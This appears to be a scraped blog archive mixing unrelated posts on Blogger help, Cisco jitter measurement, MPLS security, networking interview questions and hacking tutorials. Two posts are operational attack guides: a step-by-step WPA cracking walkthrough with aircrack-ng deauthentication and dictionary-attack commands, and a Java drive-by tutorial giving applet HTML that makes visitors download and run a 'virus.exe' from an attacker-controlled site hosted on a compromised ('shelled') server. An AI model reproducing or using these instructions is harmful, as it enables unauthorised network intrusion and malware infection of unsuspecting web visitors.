How To Crack A WPA Key With Aircrack-ng

With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2. Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).

Network Adapter I am going to use for WPA/WPA2 cracking is Alfa AWUS036H , OS# Backtrack 5R2 

Step 1 : Setting up your network device 

To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:
Command # iwconfig (to find all wireless network interfaces and their status)

Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

 Step 2 : Reconnaissance 

This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:

Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.

 Step 3 : Capturing Packets 

To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:

Command # airodump-ng -c 1 bssid AP_MAC -w data mon0 

Step 4 : De-Authentication Technique 

To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_Client is the MAC address of an associated client.

 So, now we have successfully acquired a WPA Handshake.

 Step 5 : Cracking WPA/WAP2 

Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.

Command # aircrack-ng -w wordlist ‘capture_file’.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)

Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.

About The Author 

Shaharyar Shafiq is doing Bachelors in Computer Engineering from Hamdard University. He has done C|PTE (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.

Read More

Java Hits Another Roadblock - Found To Be A Threat For Browsers

Java has been the most talked about application in the past couple of months. Not because of its functionality but due to its inability to refrain from being attacked and exploited. Oracle has released emergency security patches to deal with the vulnerabilities in Java but to no avail. Java has been attacked over and over again by free-rollers and experts alike using various tactics.


According to a report about a 100 million PCs are vulnerable to various attacks leading to unauthorized access through Java's unstable software. If things weren't bad enough for the software already, Department of Homeland Security issued a warning to all PC users to disable Java on their systems.

Experts at Websense decided to do a little bit of research on the topic. Therefore, coming up with a list of Java vulnerabilities, versions affected etc.

According to Websense;

It is probably no surprise that the largest single exploited vulnerability is the most recent one, with a vulnerable population of browsers at 93.77%. That's what the bad guys do — examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers.

Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities. And don't forget that if you're not on version 7 (which is 78.86% of you), Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.

Cheers!

About the Author:

This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.

Read More

The LightBox Image Display Option Stopped Working, Recently

Last week, the popular display option, Lightbox, used for showing full size images in Blogger blogs, stopped working.

Anxious blog owners reported that full size images are now being displayed in a normal browser window, with the browser back arrow required to return to the blog display - instead of the elegant black background overlay with the mysterious "X" which closes the overlay. The problem appears to affect all images in the blogs affected.

An immediate sampling of the forum problem reports suggested that it's likely that all Blogger blogs are affected. Since not all blogs may contain enough images, and be owned by people who are attentive enough, we are not seeing massive volumes of problem reports.

We did open a rollup discussion, in Blogger Help Forum: Something Is Broken, where we are gathering a good sample of the blogs involved. To date, no obvious affinity has been discovered, in the over 100 responses posted.

Today, we have a mysterious suggestion, posted in a forum discussion, which may provide a workaround for the problem.

We are advised to add a brief snippet of code to the template.

<script src='http://www.blogger.com/static/v1/jsbin/2321381434-lbx__fr.js' type='text/javascript'/>

The snippet in question is added to the very end of the template, using the "Edit HTML" option, in the dashboard Template wizard, after </body>, and before </html>.

</script>
</body>
<script src='http://www.blogger.com/static/v1/jsbin/2321381434-lbx__fr.js' type='text/javascript'></script>
</html>

I added this snippet of code to the template for this blog. I don't use a lot of images in this blog - but you may examine one previous post, where you will find a picture. If you click on that one picture, you will see the full size image displayed in Lightbox format - which was not the case, earlier today.

The code snippet in question is hosted in "blogger.com", so it should be safe. And, it's not difficult to add - or to remove. That said, I have no idea if it may conflict with other code - so anything is possible. It is marginally more reliable than third party code.

I've done no further testing of this fix, so I'll await your feedback. You may comment here - or in the rollup discussion.

Read More

When You Setup A Custom Domain, Please Know And Observe Your Limits Of Expertise

Too many blog owners, when they setup a custom domain for their blog, do not consider the details.

We see signs of the problem, too often, in Blogger Help Forum: Something Is Broken.

Can someone give me step by step instructions for setting up a custom domain with xxxxxxx registrar? I contacted xxxxxxx customer service - and they told me a lot of things I didn't understand! Would it be easier just to transfer the domain to GoDaddy?

The short answer here would be

Yes, it would be easier just to transfer the domain to GoDaddy.

Unfortunately, that answer is not completely correct - and the correction may leave you with a broken domain.

Too many blog owners, eager to setup a non BlogSpot URL for their blog, do not consider the details involved, when they bypass "Buy a domain".

Part of the blame, for this problem, has to fall onto Blogger's head. People using "Buy a domain", for their first domain purchase, see the domain purchase as such a simple process. They never become aware of the complexities involved in a domain purchase, until they setup their second domain, and decide to "roll their own".

Let's look at the levels of experience needed.

• Beginner: Use "Buy a domain".
• Intermediate: Use the Google Apps or Google Wallet wizard - or alternately, buy a domain from one of the 8 identified registrars.
• Advanced: Buy a domain, directly, from any of the thousands of registrars, worldwide.

---

As of 2013 June, "Buy a domain" is not offered, as part of "Add a custom domain" - although blog owners, in the USA, may use Google Domains. This will leave people outside the USA with one option - "Advanced".

---

Beginner blog owners are strongly advised to use "Buy a domain". Choose an available domain, provide payment details, and your domain is setup. Wait until Transition expires, and get to work referring your readers, search engines, and other Internet services, to your new, non BlogSpot URL.

Intermediate blog owners, able to understand simple instructions, should be able to use the wizards provided by Google Apps or Google Wallet. Alternately, Blogger provides reasonably complete and simple instructions for setting up a domain with the 8 most popular registrars.

Advanced blog owners are free to choose any registrar, of the thousands out there. But beware! You are on your own, when you do this.

• Use of any non designated registrar does not free you from the constraints of the three custom domain models.
• It will be your responsibility to determine the syntax used by the Zone Editor, that's provided by the registrar.
• It will be your responsibility to ensure that the registrar, that you choose, can provide the required DNS address entries.
• It will be your responsibility to verify the precise sequence used, in any DNS host / registrar setup task.
• It will be your responsibility to research the details, before you start.
• Once you have purchased the domain of your choice, that domain will remain with that registrar, for 30 to 60 days. Very few registrars let you buy a domain - then immediately transfer registration.

So choose your registrar according to your needs - and according to your skill level. Don't start a custom domain project, before verifying that your experience is complete. Make the right choice, before you sign on the dotted line.

Read More

If You Comment On Blogs Extensively, You Should Consider Using Google 2-Step Verification

One recently identified cause of deleted Blogger blogs appears to involve brute force hacking against our Blogger / Google accounts.

We've known, for some time, about blog owners receiving alerts about "suspicious" / "unusual" account activity. The alerts frequently involve locked or deleted Blogger / Google accounts - and generally include the owner having to change their password, solve a CAPTCHA, and / or provide their phone number (mobile or home phone) to login.

Later, people started reporting that their blogs were being deleted - possibly as a result of having to change their password, solve a CAPTCHA, and / or provide their phone number.

I've been observing - and blocking - an annoying style of comment based spam, which I have termed "nice blog" spam, for some time.

Nice blog. I will keep visiting this blog very often.

This style of spam, from what I can tell, has been published by the millions, in various blog comments, on both Blogger and non Blogger platforms.

The reason for the spam always intrigued me. Observing that the spam was published in the millions, suggested to me that it had a special purpose, intended by its creators. Looking at a typical spam message, in my email (since I moderate before publishing), I could see no consistent type of content.

• Some messages would contain links, others not.
• Some messages would mention what looked like commercial products, other references were obviously imaginary targets.
• Some messages would appear to be mere babble.

Recently, I discovered one strong possibility for the purpose of the spam - a very ingenious form of email address mining. The spam comment is only needed to allow a hacker to subscribe to a given comment stream, using the "Email follow-up comments to ..." option. It's possible that the subscription is not even affected by moderation - whether the blog owner is moderating, either before or after the comment is published to the blog, the hacker remains subscribed to the comment stream.

All that the hacker / spammer has to do is to publish a spam comment, select the "Email follow-up comments to ..." option, and watch while his Inbox fills up with subsequent comments from other Blogger / Google / OpenID account owners. Any comment containing an email address, and linking to a Blogger blog, would go straight into the hackers database.

Later, the hacker could go to work against the Blogger accounts referenced in the comments. In some cases, this would result in successfully hijacked Blogger blogs, which would become part of a spammers blog farm where advertisements of various nature could be hosted. Valuable blogs, with established reader populations, could also be used to serve malware (and more hacking) to unsuspecting readers.

The demographics of some hijacking attacks provide interesting clues. In one episode, we had a significant number of home / personal / small business blogs that had been hijacked by one specific individual. Many of the victim blogs

• Contained details relevant to the owners, which provided clues to passwords used by the owners.
• Were owned by people who used commenting extensively, for networking both with friends, and with business targets.
• Were read (and commented upon) by similar people, who similarly provided password clues in their own blogs.

Having been part of the restore process, both with people who had their blogs hijacked, and who had their accounts locked and blogs deleted, I observed that the former (hijacked blogs) seem to have decreased in volume as the latter (accounts and blogs locked / deleted) increased in volume. I don't think that the relationship is coincidental - or spurious.

My opinion is that the locking of Blogger / Google accounts - and subsequent deletion of blogs - directly results from detected attacks against the accounts in question ("suspicious" / "unusual" activity). Noting that the attacks seem to be more common to people who comment on blogs as a form of networking, it appears that commenting can lead to accounts and blogs being locked or deleted, as Google protects us against hacking.

Considering this possible cause and effect relationship, Google 2-step verification is a good idea. Click here, for Google instructions on setting up 2-step verification.

Use of 2-step verification helps safeguard our accounts against brute force hacking. This will help anybody who is anxious about accounts and blogs being deleted or locked, as a result of "suspicious" / "unusual" activity. If you own a blog which is subject to this threat, you should consider using 2-step verification.

The sanity (heart attack, ulcer) that is saved may be your own.

>> Top

Read More

Stats Displays Pageviews - Not Unique Visitors

Too many blog owners do not understand the unique capability of Stats - nor do they understand its limitations.

We see the periodic question in Blogger Help Forum: How Do I?.

How do I find out how many actual people are viewing my blog?

Stats does not provide unique visitor counts - Stats provides pageview counts.

It's simply not possible to determine, with 100% certainty, how many different people are viewing your blog.

Consider these environments, where multiple locations, or people, are involved.

• A single person can use multiple computers, simultaneously.
• A single person can use a mobile computer, moving from one cellular connection to another.
• Multiple people can view the same computer, simultaneously.
• Multiple people can share the same computer, serially.
• Multiple people can share the same Internet connection, serially.

There are other visitor meters besides Stats - and some other such products will provide "unique" visitor counts. Each product, which claims to provide "unique" visitor counts, will do so based upon specific limitations and techniques.

One of the most obvious ways to determine unique visitors is by comparing IP addresses. Surely, two pageviews from the same IP address will be one person - and two pageviews from two different IP addresses will be two people, right? Wrong.

• One person can use two computers, simultaneously.
• One person can use a mobile computer, moving between two locations (each location will have a different IP address).
• Two people can use the same computer, at a library or Internet cafe.
• Two people can use the same mobile Internet connection.

In each of these cases, one person may look like two people - or two people can look like one person.

It's even possible that two people can access the same page, from the same computer, one after the other. If the first person does not properly clear the computer, after use, the second page access will be from cache - and will not access the server. The second person, using that computer, will not show up in a Stats log. Again, two people can look like one.

Some visitor logs will drop cookies onto a computer. Detecting a cookie already in place, this indicates one person, returning - and successfully dropping a cookie, indicates a different person, right? Wrong, again.

• Again, a shared computer is a possibility.
• Not all computer owners will permit unknown websites to drop cookies, onto their computers.
• And some owners, when they permit cookies on their computers, will periodically clear cookies.

Some very sophisticated visitor logs can compare demographic details, similar to the Stats Audience display. Besides IP address, what can be determined?

• Operating system, brand, model, and version.
• Browser brand, model, and version.
• Maybe, location (possibly determined by IP address, again).

And finally, some visitor logs will compare IP address, over a given time interval. Arbitrarily deciding that all activity from the same IP address, over a period of 30 minutes, represents a statistical "single person", is a known technique. This is not a legally significant technique, however.

The bottom line is, as I state repeatedly, you simply cannot compare numbers from any two visitor logs or meters, with any degree of usefulness. Each product will have its own way of determining unique visitors - when they even suggest a "unique" visitor count. Stats simply avoids the uncertainty, and only provides pageview counts.

>> Top

Read More

If You Use CAPTCHA Screening On Your Blog, Try Publishing A Comment, As A Guest

Not all Blogger blog owners, using CAPTCHA screening to reduce abusive comments on their blogs, know first hand what the typical CAPTCHA puzzle can be like.

We're seeing a few concerned blog owners, in Blogger Help Forum: Something Is Broken, asking why they're seeing fewer comments on their blogs.

I'm hearing from people that they can't post comments on my blog. I tested, and comments are working just fine. What is the problem, here?

Not all blog owners bother to test the CAPTCHA, on their blogs - or even know why they don't see one, when commenting.

Not all blog owners, enabling Word verification in their blog commenting settings, bother to read the tool tip behind the "?".

Show word verification
This will require people leaving comments on your blog to complete a word verification step, which will help reduce comment spam. Learn more.
Blog authors will not see word verification for comments.

The simple advice

Blog authors will not see word verification for comments.

does not sink in, to everybody.

This leaves many blog owners unaware of how frustrating it may be, for their guests to comment, on their blogs.

If you're a blog owner, musing whether to add word verification to your blog, in an effort to cut down on the spamming and trolling going on in many blog comment threads, maybe you should try posting on your blog, as a guest. With "Show word verification" set to "Yes", logout from Blogger - or clear cache, cookies, and sessions (yes, all 3!) - then restart the browser, and try leaving a comment on your blog.

What you discover may not please you. Then ask yourself how many of your readers will have the patience, to solve a CAPTCHA, every time they wish to publish a comment?

As a blog owner, you have 3 settings which are used, in proper combination, to provide a safe environment for your readers to leave comments.

1. Authentication.
2. CAPTCHA Screening.
3. Moderation.

Consider using one or both of the other two options, if possible.

>> Top

Read More

Renaming Your Blog Requires Choosing An Available Blog Name

Like creating a blog, the task of renaming your blog involves one very important step - choosing an available blog name.

When you rename your blog - as in change the blog address - you have to pick a name (address) that's not in use. Both creating a blog, and renaming a blog, suffer from one key detail - you can't identify an available address before you get started.

When you create, or rename, a blog, you can only get to the task at hand, and start with the best choice.

Like "Create a blog", you'll only find out about an available URL after you have successfully chosen that URL for your blog. Unlike "Create a blog", the Blog Address wizard does not verify availability in real time.

1. Paste or type the desired blog name (Only the "yyyyyyy" in "yyyyyyy.blogspot.com").
2. Hit Save.
3. If the name was available, you'll be looking at the initial Blog Address display, with the new address "yyyyyyy.blogspot.com" identified - and "yyyyyyy" will now be unavailable.
4. If the name is not available, you'll get the sad news

   Subdomain: yyyyyyy is not available.

   And now, go back to Step #1, and try again.

If you want to do the rename with the least stress, you make a list of possible choices before you start, and sort the list in decreasing preference. Decide which names you like the most, before you start. Then start the above process with Step #1, and your top choice. If you end at Step #4, pick the next choice in the list, and go to Step #1, again.

As with "Create a blog", you should plan to go through your list as promptly as possible. Hesitate too long, when making the next choice, and your alternate choices could be unavailable.

If your choice of name will affect design work on the existing blog, yet you wish to change the blog design before renaming the blog, setup a stub blog - and pick the best available name for the stub blog, now. Once that's done, make the necessary design changes on your current blog - then swap names between the stub blog and your current blog. You'll likely use the stub blog, later.

As with creating a new blog, please note that addresses previously taken will not be reissued to you by Blogger - a 10 year old blog remains valid, whether published once daily for 10 years, or once 10 years ago and never again.

And as soon as you get the new name successfully chosen, be prepared to continue the renaming process, as promptly as possible.

>> Top

Read More

Is MPLS Network Really Secure? MPLS truth revealed against security.

Is MPLS Network Really Secure? MPLS truth revealed against security.

There is a common misconception that MPLS provides some level of security.

The truth is that MPLS offers-

• No protection against misconfiguration - Human and machine errors as well as OS bugs can result in MPLS traffic being misrouted.

• No protection from attacks within the core - MPLS is vulnerable to all the traditional WAN attack vectors.

• No protection or detection of sniffing/snooping - It is impossible to detect if someone is siphoning or replicating data - there is no “alarm” that goes off if data is being stolen.

• No Data Security - The data is left in the clear and can be accessed, replicated, or used by anyone who gains access to it.

The illustration above shows the components of an MPLS header. Note the absence of any security measures within the header itself.

• The Label Value provides forwarding information used by the routers.
• Traffic Class (TC) bits are used to provide services such traffic prioritization.
• The Stacking bit (S) allows multiple labels to be used.
• TTL is a “time to live” marker to allow packets to expire.

None of these mechanisms provide security.

Also note that the original IP packet is unchanged, which means with MPLS- your data traverses a shared network in the clear.

Hackers and Data Thieves know better!

There are papers and video tutorials readily available on the Internet that provide a “cook book” approach to sniffing and redirecting MPLS traffic. Here’s what Black Hat had to say about MPLS security claims:

Providers say: Traffic streams are kept separate.
Hackers know: The mechanism used to separate traffic can also be used to identify targets of interest!

Providers say: There are controls around provisioning and management.
Hackers know: Provisioning and management are to data security what traffic lights are to bank robbers - they do not prevent data theft!

Providers say: There are gateways between the Internet and the MPLS network.
Hackers know: Traffic is not accidentally leaking out to the Internet, it is being stolen right off the MPLS backbone!

Providers say: They use Netflow/J-Flow to identify ”malicious activity”.
Hackers know: Post-event notification is not a substitute for prevention!

Read More

Why You Need to Measure Delay, Jitter and Packet Loss on Data Networks

Why You Need to Measure Delay, Jitter and Packet Loss on Data Networks

With the emergence of new applications such as voice and video on data networks, it is becoming increasingly important for network managers to accurately predict the impact of these new applications on the network. Not long ago, you could allocate bandwidth to applications and allow them to adapt to the bursty nature of traffic flows. Unfortunately, that’s no longer true because today applications such as voice and video are more susceptible to changes in the transmission characteristics of data networks. Therefore, network managers must be completely aware of network characteristics such as delay, jitter, and packet loss, and how these characteristics affect applications.

Why You Need to Measure Delay, Jitter and Packet Loss

To meet today’s business priorities and ensure user satisfaction and usage, IT groups and service providers are moving toward availability and performance commitments by IP application service levels or IP service-level agreements (SLAs).

Prior to deploying an IP service, network managers must first determine how well the network is working, second, deploy the service, such as voice over IP (VoIP), and finally, verify that the service levels are working correctly—which is required to optimize the service deployment. IP SLAs can help meet life-cycle requirements for managing IP services. To ensure the successful implementation of VoIP applications, you first need to understand current traffic characteristics of the network. Measuring jitter, delay, and packet loss and verifying classes of
service (CoS) before deployment of new applications can aid in the correct redesign and configuration of traffic prioritization and buffering parameters in data network equipment.

This article discusses methods for measuring delay, jitter, and packet loss on data networks using features in the Cisco IOS® Software and Cisco routers.

Delay is the time it takes voice to travel from one point to another in the network. You can measure delay in one direction or round trip. One-way delay calculations require added infrastructure such as Network Time Protocol (NTP) and clock synchronization and reference clocks. NTP is deployed to synchronize router clocks and also when global positioning system (GPS) or another trusted reference time is needed in the network. Accuracy of clocks and clock drift affect the accuracy of one-way delay measurements. VoIP can typically tolerate delays of up to approximately 150 ms one way before the quality of a call is unacceptable to most users.

Jitter is the variation in delay over time from point to point. If the delay of transmissions varies too widely in a VoIP call, the call quality is greatly degraded. The
amount of jitter that is tolerable on the network is affected by the depth of jitter buffer on the network equipment in the voice path. When more jitter buffer is available, the network is more able to reduce the effects of the jitter for the benefit of users, but a buffer that is too big increases the overall gap between two packets. One-way jitter measurement is possible and does not require clock synchronization between the measurement routers.

Packet loss severely degrades voice applications and occurs when packets along the data path are lost. Measuring Network Performance Key capabilities in the Cisco IOS Software can help
you determine baseline values for VoIP application performance on the data network. The ability to gather data in real time and on demand makes it feasible for IT groups and service providers to create or verify SLAs for IP applications; baseline values can then be used to substantiate an IP SLA for VoIP.

Cisco IOS Service Assurance Agent (SAA) technology is a component of an IP SLA solution and the Round Trip Time Monitor (RTTMON) MIB, which enable the testing and collection of delay, jitter, and packet loss measurement statistics. Active monitoring with traffic generation is used for edge-to-edge measurements in the network to monitor the network
performance. You can use the CiscoWorks Internetwork Performance Monitor (IPM) network management

Is Your Network Ready for Voice?

Measuring Delay, Jitter, and Packet Loss for Voice-Enabled Data Networks Your success or failure in deploying new voice technologies will depend greatly on your ability to understand the traffic characteristics of the network and then applying your knowledge to engineer the appropriate network configurations to control those characteristics.

TECH TIPS & TRAINING

Application or the IOS command-line interface (CLI) to configure and retrieve data from the RTTMON MIB, or choose from a wide selection of Cisco ecosystem partners and public domain software to configure and retrieve the data. In addition, the CiscoWorks IPM features are now also available in the WAN Performance Utility (WPU) module of CiscoWorks IP Telephony Environment Monitor (ITEM) network management software.

Deploying Delay/Jitter Agent Routers

You can measure delay, jitter, and packet loss by deploying almost any Cisco IOS device, from a
Cisco 800 Series Router on up. Two deployment scenarios are possible: You can either purchase dedicated routers for SLA measurements or use current routers within the network. Place the routers in a campus network along with hosts to provide statistics for end-to-end connections.
It is not practical to measure every possible voice path in the network, so place the dedicated routers in typical host locations to provide a statistical sampling of typical voice paths.
In the case of VoIP deployments using traditional phones connected to Cisco routers using FXS station ports, the router to which the phones are connected also serves as the delay/jitter measurement device. Once deployed, the operation collects statistics and populates Simple Network Management Protocol (SNMP) MIB tables in the probe router. You can then access the data either through the CiscoWorks IPM, or through simple SNMP polling tools and other third-party applications. Additionally, after baseline values have been established, you can configure operations to send alerts to a network management system (NMS) station if thresholds
for delay, jitter, and packet loss are exceeded.

Simulating a Voice Call

One of the strengths of using Cisco IOS SAA as the testing mechanism is that you can simulate a voice call. In Cisco IOS Software Release 12.3(4)T and later, you can configure the VoIP codec directly in the CLI and simulate a voice call. This release also includes voice quality estimates, Mean Opinion Scores (MOS), and Planning Impairment Factor (PIF) scores. Earlier versions of the Cisco IOS Software enable you to estimate a VoIP codec using the correct packet size, spacing, and interval for the measurement data and enter the appropriate parameters.

The CoS can be set on data or VoIP tests, which allows you to verify how well QoS is working in the network. Examples of how to simulate a voice call are shown below.

With Cisco IOS Software Release 12.3(4)T or later, you can use the VoIP jitter operation to simulate a test call:

rtr 1
type jitter dest-ipaddr 10.1.1.2 dest-port 14384 codec g711alaw
rtr schedule 1 start-time now

With earlier IOS releases before 12.3(4)T you can use the rtp/udp even port numbers in the range of 16384 to 32766. The user then approximates 64 kbit/s, and the packet size is 200 bytes {(160 bytes of payload + 40 bytes for IP/UDP/RTP (uncompressed) }. You can simulate that type of traffic by setting up the jitter operation as shown below.

The jitter operation accomplishes the following:

• Send the request to rtp/udp port number 14384
• Send 172 byte packets (160 payload + 12 byte RTP header size) + 28 bytes (IP + UDP)
• Send 3000 packets for each frequency cycle
• Send every packet 20 milliseconds apart for a duration of 60 seconds and sleep 10 seconds before starting the next frequency cycle

The parameters in the example above give you 64 kbit/s for the 60-second test period.

((3000 datagrams * 160 bytes per datagram)/ 60 seconds))* 8 bits per byte = 64 kbit/s

The configuration on the router would look like this:

rtr 1
type jitter dest-ipaddr 10.1.1.2 dest-port 14384 numpackets 3000 request-data-size 172**
frequency 70
rtr schedule 1 start-time now

Note that IP+UDP is not considered in the requestdata-size, because the router internally adds them to the size automatically.

Delay/Jitter Probe Deployment Example

The two routers below would simulate voice calls of 64 kbit/s every 60 seconds and record delay, jitter, and packet loss in both directions. Note that the delay calculations are round-trip times and must be divided by two to arrive at the amount of one-way delay unless NTP is implemented for one-way delay measurements.

router1# rtr responder rtr 1 type jitter dest-ipaddr 10.1.2.1 dest-port 14384 codec g711alaw
tos 160 frequency 60 rtr schedule 1 start-time now

router2# rtr responder rtr 1 type jitter dest-ipaddr 10.1.1.1 dest-port 14385 codec g711alaw
tos 160 frequency 60 rtr schedule 1 start-time now

Command-Line Data Examples

To view the results you can use the IOS show command at the command line for the jitter operation. Additionally, you can use the command-line data for real-time monitoring and troubleshooting of delay, jitter, and packet loss. For an example of the CLI output, refer to cisco.com/packet/163_4b1.

Monitoring Thresholds

You can use the CLI, CiscoWorks IPM, or the WPU in CiscoWorks ITEM to configure features and monitor data. You can use this data to manage IP SLAs that have been created for VoIP. After you have determined baseline values, you can reconfigure the jitter operations to monitor the network. When predetermined delay and jitter service-level thresholds are reached or exceeded, NMS stations will be alerted.

After you have established baseline values through the initial data collection, you can monitor the delay, jitter, and packet loss levels in the network with the embedded alarm features of Cisco IOS SAA.

The Cisco IOS SAA threshold command sets the rising threshold (hysteresis) that generates a reaction event and stores history information for the operation. Cisco IOS SAA can measure and create thresholds for round-trip time delay, average jitter, connectivity loss, one-way packet loss, jitter, and delay.

Sample Service Assurance Threshold Configuration

router1# rtr 100 rtr reaction-configuration 100 threshold-falling 50 threshold-type immediate action trapOnly

Understanding the traffic characteristics of the network before you deploy new advanced applications is the key to successful implementations. Delay, jitter, and packet loss greatly affect VoIP applications. Your success or failure in deploying new voice technologies will depend greatly on your ability to understand the traffic characteristics of the network and then applying your knowledge to engineer the appropriate network configurations to control
those characteristics.

---Do you want to share you views?? Just leave a comment here. you can also drop an email on mail@amarjit.info

Read More

DOM Based XSS In Microsoft

           
Lately, i have been researching on DOM based XSS a bit, In my previous post i talked about the DOM based XSS i found inside AVG, DOM based XSS is caused due to lack of input filtering inside client side javascripts, since most of the code is moving towards client side, therefore DOM based xss have been very common now a days, It is predicted by the experts that the DOM based xss mostly occurs in the websites that heavily rely upon javascripts.

I have reported several DOM based XSS inside Microsoft, most of them were due to the lack of input filtering/sanitization inside of the several tracking scripts such as sitecatalyst and riotracking scripts as they often introduce some vulnerable sources and sinks. With that being said, let's take a look at the POC of the attack:

The vulnerability occurs due to lack of filtering being done inside riotracking script (Line 58), There are other microsoft domains that are also using the same tracking script vulnerable to DOM based XSS, see if you can find one?.

Read More

How Attackers Spread Malware With Java Drive by?

Hello RHA fans,

We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff.  But cheers up my friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.



Well In this tutorial RHA will show you to spread virus with JAVA DRIVE BY!

What is java drive by:

A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this:

Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job.

Tools we need in this game are:

i) a .jar file which is the main player of this game. Download it from here http://www.mediafire.com/?mmafl2carb1s159
ii) A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page.
iii) A java script which is the backbone of your game.

Now lets get started, Upload you .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear

Java Code: 

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe">


So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:

 So this is it! Simplest and most effective method used by attackers to spread your malicious software.

 About the author

This article has been written by fahad awan, He is the newest author on RHA team. We wish him best of luck with his tutorials. 

Read More

Interview questions for fresher network engineer: Tips and Tricks for CCNA, CCNP, OSPF, BGP, MPLS-VPN | Ask all your queries online absolutely free

This is guest post from Mr.Shivlu Jain. He is running a blog related to MPLS VPN

If you have any concerns or any question related with any protocol or networking technology, you can visit his blog and just leave a comment. All you questions will be answered by professionals absolutely free.

Market is on boom and almost every company has opened its door for new positions and everyone is looking for change to grab new positions with new challenges. So make sure that you have prepared the answers for the below questions before your interview. The questions are generic and will make very good impression on interviewer if you answer them in organised and structured manner. The depicted IGP interview questions are for CCNA and CCNP engineers.

1. Difference between RIPv1 and RIPv2?

2. How many number of routes carried by RIP packet?

3. Is OSPF link state or distance vector or path vector protocol?

4. What is the difference between OSPF and IS-IS and which one is preferred?

5. Can we use BGP instead of any IGP?

6. How many network types available in OSPF?

7. Different type of Link State Advertisements aka LSA?

8. LSA 3 and LSA 4 are generated by which router?

9. When to use Stub and Not So Stubby Area?

10. How to get the external routes without making area Not So Stubby?

11. What is the different type of route summarization available in OSPF?

12. What is the requirement of doing summarization?

13. A major network is advertised as summary in one area and few of the routes from that network is configured in another area. What will happen in that case?

14. If any of the OSPF area is not stabilized, does it impact another area?

15. What is the use of forwarding address in LSA 5 and LSA 7?

16. External routes are available in OSPF database but not installing in routing table?

17. If loopback is not configured, what will be the router-id selected by OSPF process?

18. Can we run multiple OSPF process in single router and what is the advantage of using it?

19. What are timers of OSPF?

20. Multicast address of used by OSPF.

21. OSPF works on which layer?

22. What is backbone area in OSPF?

23. Can we use OSPF without backbone area?

24. Is it required that OSPF router-id must reachable in IGP cloud?

25. After configuring new router-id, automatically it will be used or do we need to use some type of command to get it operational.

26. Why the secondary ip address of interface is not advertising in IGP cloud?

27. OSPF neighbourship is not coming up. Please tell the various steps to troubleshoot it.

28. One side MTU is 1500 and another side MTU is 1600. Does it affect neighbourship?

29. Provide process of DR and BDR election.

30. If DR is down and no BDR is configured what will happen?

31. What is the difference between a neighbor and adjacent neighbor?

32. My OSPF neighbourship is showing 2-way, what does it mean?

33. Define different type of OSPF neighbor states?

34. OSPF external routes are not redistributing?

For more CLICK HERE

Read More

Blogger Blogs Displaying Mysterious "SECURITY WARNING" Popup Boxes

This week, we're seeing a few concerned blog owners, in Blogger Help Forum: Something Is Broken, asking about a mysterious SECURITY WARNING popup box, on their blogs.

Like the earlier concern about the transparent boxes covering the blog, this appears to be another broken FaceBook Connect gadget.

The mysterious SECURITY WARNING isn't too hard to resolve.

Generally, the problem will start with a new FaceBook accessory, recently added.

<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/id_ID/all.js#xfbml=1";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

<div class="fb-like-box" data-href="http://www.facebook.com/xxxxxxx" data-width="265" data-show-faces="true" data-stream="true" data-header="true"></div>

If you can identify the problem gadget in your blog, you can edit the gadget, and Remove it. Some owners have installed the code in question, in a specific post.

